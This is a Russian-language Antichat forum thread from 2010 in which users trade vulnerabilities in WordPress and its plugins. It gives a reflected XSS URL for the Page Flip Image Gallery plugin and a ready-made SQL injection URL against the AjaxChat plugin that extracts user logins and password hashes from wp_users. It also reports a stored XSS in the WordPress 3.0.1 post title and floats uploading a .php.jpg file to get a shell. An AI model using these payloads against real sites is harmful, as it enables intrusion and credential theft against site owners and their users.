HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.06.2010, 22:51
karencho777
Новичок
Регистрация: 20.01.2010
Сообщений: 4
С нами: 8582262

Репутация: 0
По умолчанию

подскажите как узнать версию wordpress
 
Ответить с цитированием

  #2  
Старый 06.06.2010, 22:55
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
С нами: 8743576

Репутация: 241
По умолчанию

Цитата:
Сообщение от karencho777  
подскажите как узнать версию wordpress

В исходнике страницы.
<meta name="generator" content="WordPress x.x" />
 
Ответить с цитированием

  #3  
Старый 07.06.2010, 00:35
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Page Flip Image Gallery cкачать
Version 0.5.10.8 Updated 2010-4-29 Downloads 459,700

Passive XSS
wp-content\plugins\page-flip-image-gallery\script.php
PHP код:
<?php 
ob_start
();
error_reporting(0);

if (
$_GET['action'] == 'test')
{
    echo 
"OK\n".$_GET['id'];
    exit();
}
/*...*/
http://[host]/wp-content/plugins/page-flip-image-gallery/script.php?action=test&id=<script>alert(123)</script>

Последний раз редактировалось Strilo4ka; 07.06.2010 в 00:47..
 
Ответить с цитированием

  #4  
Старый 07.06.2010, 00:48
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

Цитата:
Сообщение от Strilo4ka  
В файле upload.php можна походу грузить файл, но разширение должно быть как картинка, если веб-сервер обрабат. .php.jpg как php -> шелл
Что значит обрабатывает php.jpg как php?
Впервые такое слышу.

Он будет обрабатывать его как картинку, так что чтобы выполнить код скрипта придется искать, скажем, инклуд
 
Ответить с цитированием

  #5  
Старый 07.06.2010, 02:12
brain[pillow]
Участник форума
Регистрация: 07.11.2008
Сообщений: 124
С нами: 9214741

Репутация: 386
По умолчанию

Цитата:
Сообщение от total90  
В мозилле код не выполнится!

Эксплуатация:[host]/[path]/?s=[xss]
Пример: http://seocekret.ru/?s=<script>alert()</script>
Риальне пи3датая пассивка, только вот жаль такой же её пи3датый "обнаруженец" не знает, что для того чтобы в мозилле увидеть результат функции alert(), в неё нужно что-нибудь передать.
 
Ответить с цитированием

  #6  
Старый 07.06.2010, 05:01
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

AjaxChat скачать
Last Updated: 2010-6-2

SQL inj
wp-content\plugins\ajaxchat\ajaxchat_ping.php
PHP код:
require_once('ajaxchat_config.php');
if(!
session_id()) { session_start(); }
header("Pragma: no-cache");
header("Cache-Contro: no-cache");
$id=$_GET['lastid']?$_GET['lastid']:0;
function 
getrand($len) {
    
$str="";
    
$a=array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');
    for(
$i=0;$i<$len;$i++) {
        
$rand=rand(0,count($a)-1);
        
$str.=$a[$rand];
    }
    return 
$str;
}
global 
$current_user;
get_currentuserinfo();
$t=time();
$r=$wpdb->get_row("SELECT name,starttime FROM ".$wpdb->prefix."ajaxim_sess WHERE sessid='".session_id()."'");
if(!
$r->name) {
    
$wpdb->query("INSERT INTO ".$wpdb->prefix."ajaxim_sess (name,lasttime,starttime,sessid) VALUES('Guest_".getrand(5)."',".$t.",".$t.",'".session_id()."')");
}
else {
    
$wpdb->query("UPDATE ".$wpdb->prefix."ajaxim_sess SET lasttime=".$t." WHERE sessid='".session_id()."'");
    if(
$current_user->ID!='' && $r->name!=$current_user->display_name) {
        
$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."ajaxim_sess SET name='%s' WHERE sessid='%s'",$current_user->display_name,session_id()));
    }
}
$_SESSION['lastmsg']=$id;
$r2=$wpdb->query("SELECT name,time,msg,msgid FROM ".$wpdb->prefix."ajaxim_data WHERE time>".$r->starttime." AND msgid>".$id." ORDER BY time");
if(
$r2>0) {
    
$str="NEW:";
    foreach(
$wpdb->last_result as $res) {
        
$str.="<div id='".$res->msgid."' name='".$res->msgid."'>(".date("g:ia",$res->time).")&nbsp;&lt;".$res->name."&gt;&nbsp;".stripslashes($res->msg)."</div>";
    }
    print 
$str;

Exploit:
http://[host]/wp-content/plugins/ajaxchat/ajaxchat_ping.php?lastid=1+or+1=1+union+select+1,2 ,concat_ws(0x3a,user_login,user_pass),4+from+wp_us ers

Последний раз редактировалось Strilo4ka; 07.06.2010 в 05:03..
 
Ответить с цитированием

  #7  
Старый 14.08.2010, 15:18
Berman
Участник форума
Регистрация: 20.02.2010
Сообщений: 121
С нами: 8538012

Репутация: 60
По умолчанию

для wp 3.0.1 есть уязвимости?
 
Ответить с цитированием

  #8  
Старый 15.08.2010, 10:18
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию

Цитата:
Сообщение от Berman  
для wp 3.0.1 есть уязвимости?
http://blog.ru/wp-admin/post-new.php

Уязвимое поле: "Заголовок"

Тип уязвимости: Актив XSS

Цитата:
Сообщение от None  

Публикация приводит к XSS на главной.

Нашел вчера, у себя в блоге тестил.
 
Ответить с цитированием

  #9  
Старый 17.08.2010, 11:26
RA1Sh
Новичок
Регистрация: 29.11.2009
Сообщений: 0
С нами: 8657096

Репутация: 0
По умолчанию

Цитата:
Сообщение от satana-fu  
http://blog.ru/wp-admin/post-new.php
Уязвимое поле:
"Заголовок"
Тип уязвимости:
Актив XSS
Публикация приводит к XSS на главной.
Нашел вчера, у себя в блоге тестил.
Как её прикрыть ? ))
 
Ответить с цитированием

  #10  
Старый 17.08.2010, 17:39
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от RA1Sh  
Как её прикрыть ? ))
для этого есть много различных мануалов, и если будут проблемы то можно задавать их тут /forum37.html специальный спец раздел.

з.ы /thread30641.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.